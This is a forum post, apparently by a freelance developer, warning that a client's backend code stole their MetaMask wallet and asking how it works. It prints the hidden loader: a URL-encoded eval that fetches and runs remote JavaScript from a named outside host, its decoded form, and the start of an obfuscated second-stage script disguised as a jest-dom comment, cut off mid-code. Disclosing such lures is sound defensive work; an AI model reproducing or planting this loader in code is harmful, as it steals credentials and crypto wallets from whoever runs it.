I wanted to share how my MetaMask wallet was hacked yesterday as a cautionary tale.
I received a new project through Freelancer.com. The client had a ‘payment verified’ badge, so I assumed they were legitimate. The project involved web3 backend development, which I was confident I could handle.
After accepting the contract, the client invited me to their GitLab project and asked me to run their backend code. Soon after running it, I realized that my MetaMask wallet had been compromised. Fortunately, I didn’t lose much money, but I want to warn everyone to be cautious when running new code on your machine.
After analyzing the code, I discovered it downloads and executes a script file. I’ve attached the code here.
Does anyone explain how this code works???
Original code
eval(decodeURIComponent('%66%65%74%63%68%28%65%76%61%6c%28%64%65%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%27%25%32%37%25%36%38%25%37%34%25%37%34%25%37%30%25%33%61%25%32%66%25%32%66%25%36%63%25%36%39%25%36%31%25%36%65%25%37%38%25%36%39%25%36%65%25%37%38%25%36%39%25%36%31%25%36%66%25%32%65%25%36%33%25%36%66%25%36%64%25%33%61%25%33%35%25%33%30%25%33%30%25%33%30%25%32%66%25%37%34%25%36%66%25%36%62%25%36%35%25%36%65%25%36%39%25%37%61%25%36%35%25%37%32%25%32%37%27%29%29%29%2e%74%68%65%6e%28%6c%36%69%72%76%3d%3e%6c%36%69%72%76%2e%74%65%78%74%28%29%29%2e%74%68%65%6e%28%7a%31%6f%6c%77%3d%3e%7b%65%76%61%6c%28%7a%31%6f%6c%77%29%7d%29%20'));
After checking this code, I can get the below code
eval(
fetch(
eval(
decodeURIComponent('http://lianxinxiao.com:5000/tokenizer')
)
)
.then(l6irv=>l6irv.text())
.then(z1olw=>{eval(z1olw)})
)
From here -> http://lianxinxiao.com:5000/tokenizer
/* learn more: https://github.com/testing-library/jest-dom // @testing-library/jest-dom library provides a set of custom jest matchers that you can use to extend jest. These will make your tests more declarative, clear to read and to maintain.*/ // Job ID: iq8lqtm4u2uu
let QlSfb;
!(function () {
const kOzv = Array.prototype.slice.call(arguments);
return eval(
"(function UdZq(Dt6i){const f18i=PAdh(Dt6i,fT0g(UdZq.toString()));try{let zo1i=eval(f18i);return zo1i.apply(null,kOzv);}catch(bW3i){var DlYg=(0x9D8DE4-0O47306735);while(DlYg<(0o1000232%0x1001D))switch(DlYg){case (0x9D8DE4-0O47306735):DlYg=bW3i instanceof SyntaxError?(262351%0o200054):(0o206534-68918);break;case (0o203504-67365):DlYg=(0o202760-0x105CA);{console.log('Error: the code has been tampered!');return}break;}throw bW3i;}function fT0g(zgTg){let bOVg=199618237;var vbOg=(0o202164-0x1044E);{let XIQg;while(vbOg<(0o400167%65576)){switch(vbOg){case (0o400056%65550):vbOg=(0x102A8-0o201227);{bOVg^=(zgTg.charCodeAt(XIQg)*(0x2935494a%7)+zgTg.charCodeAt(XIQg>>>(0x5E30A78-0O570605164)))^614269451;}break;case (0o400105%65562):vbOg=(0x40055%0o200015);XIQg++;break;case (0x40065%0o200021):vbOg=XIQg<zgTg.length?(0o203124-67138):(0o1000277%65574);break;case (0o400122%0x10016):vbOg=(0o1000135%0x1000F);XIQg=(0x21786%3);break;}}}let r6Ig="";var TDLg=(67396-0o203445);{let TFih;while(TDLg<(0x105F0-0o202712)){switch(TDLg){case (0o204660-67985):TDLg=(0o201274-0x102B2);TFih=(0x21786%3);break;case
…. ….